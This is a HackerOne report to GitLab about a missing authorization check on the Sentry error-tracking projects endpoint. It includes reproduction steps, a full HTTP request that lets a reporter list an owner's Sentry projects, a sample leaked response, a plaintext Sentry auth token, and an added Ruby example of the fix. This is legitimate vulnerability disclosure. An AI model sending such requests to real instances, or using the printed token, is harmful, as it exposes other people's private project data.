A project reporter can leak owner's Sentry instance projects
HackerOne report #1947211 by js_noob
on 2023-04-14, assigned to @dcouture:
Report
Summary
Hello team, as part of project error tracking, a user (owner or maintainer) can connect Sentry to GitLab to track project errors. This step allows the "owner" to connect to Sentry and fetch the available projects; this should only be available to "owners". It can be done by clicking the Connect button on Project Settings => Monitor => Error Tracking (see the screenshot below). However, even a project reporter can fetch the connected Sentry instance's projects.
Steps to reproduce
As an owner:
- Create a new ultimate trial group, and create a new project in that group
- Enable Sentry error tracking by going to https://gitlab.com/GROUP/PROJECT/-/settings/operations under Error tracking; you can use my Sentry instance, and choose any project in the drop-down:
* Sentry API URL: https://xyz-6jv.sentry.io/
* Auth Token: a6d9c60bd9254c19995af8f0502b6d9aa2412dd92e724204a8b948e52b87dfc1
- Invite a reporter to the project/group
As the reporter:
- Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/operations and verify that you are blocked
- Send the following request to grab all the Sentry instance projects. Change the api_host if you used your own instance:
GET /GROUP/PROJECT/-/error_tracking/projects?api_host=https://xyz-6jv.sentry.io/&token=* HTTP/2
Host: gitlab.com
Cookie: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: REDACTED
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
- The response should look similar to the one below, leaking all projects:
{"projects":[{"id":"4505012306182144","name":"secret-project","status":"active","slug":"secret-project","organization_name":"XYZ","organization_id":"4505012227342336","organization_slug":"xyz-6jv"},{"id":"4505012228915200","name":"javascript","status":"active","slug":"javascript","organization_name":"XYZ","organization_id":"4505012227342336","organization_slug":"xyz-6jv"}]}
NB: I know that this exploitation requires knowing the Sentry domain, but there are a lot of ways that this can be done; a couple of examples: if the reporter was a maintainer and was demoted, or simply by brute force. However, the "real" bug/issue here is the missing authorization on -/error_tracking/projects.
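The missing authorization check described above, as an added example (not GitLab's own code): a small Ruby model of the endpoint before and after a role check. The numeric access levels, the required level (maintainer) and the Sentry host are assumptions or constructed values for the example.

```ruby
# Added example, not GitLab's own code: a minimal model of the missing
# authorization check behind /-/error_tracking/projects. Role names follow
# GitLab's access levels; the numeric values and the required level are
# assumptions for the example.
ACCESS_LEVELS = {
  guest: 10, reporter: 20, developer: 30, maintainer: 40, owner: 50
}.freeze

# Assumption: the settings page that connects Sentry requires maintainer
# access, so the JSON endpoint that lists Sentry projects must require the
# same level. Anything lower lets a reporter bypass the settings page.
REQUIRED_LEVEL = ACCESS_LEVELS[:maintainer]

# Constructed stand-in for the Sentry instance the owner connected.
SAMPLE_HOST = "https://example-org.sentry.invalid/"
SENTRY_BY_HOST = {
  SAMPLE_HOST => [
    { "id" => "1", "name" => "secret-project", "slug" => "secret-project" }
  ]
}.freeze

def can_list_sentry_projects?(role)
  level = ACCESS_LEVELS[role]
  !level.nil? && level >= REQUIRED_LEVEL
end

# Stand-in for the Sentry API call made with the stored token.
def fetch_sentry_projects(api_host)
  SENTRY_BY_HOST.fetch(api_host, [])
end

# Vulnerable handler: the caller's role is never consulted, so any project
# member who knows api_host receives the full project list.
def list_projects_vulnerable(_role, params)
  { status: 200, body: { "projects" => fetch_sentry_projects(params["api_host"]) } }
end

# Fixed handler: authorize before touching Sentry. A 404 (rather than 403)
# avoids confirming to lower roles that the endpoint exists.
def list_projects_fixed(role, params)
  unless can_list_sentry_projects?(role)
    return { status: 404, body: { "message" => "404 Not Found" } }
  end
  { status: 200, body: { "projects" => fetch_sentry_projects(params["api_host"]) } }
end
```

The check runs before any Sentry call, so a reporter never triggers the outbound request with the stored token.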
Video/POC
bandicam_2023-04-14_14-56-04-252.mp4
Impact
A project reporter can leak the owner's Sentry instance projects by knowing the domain, without the auth token.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: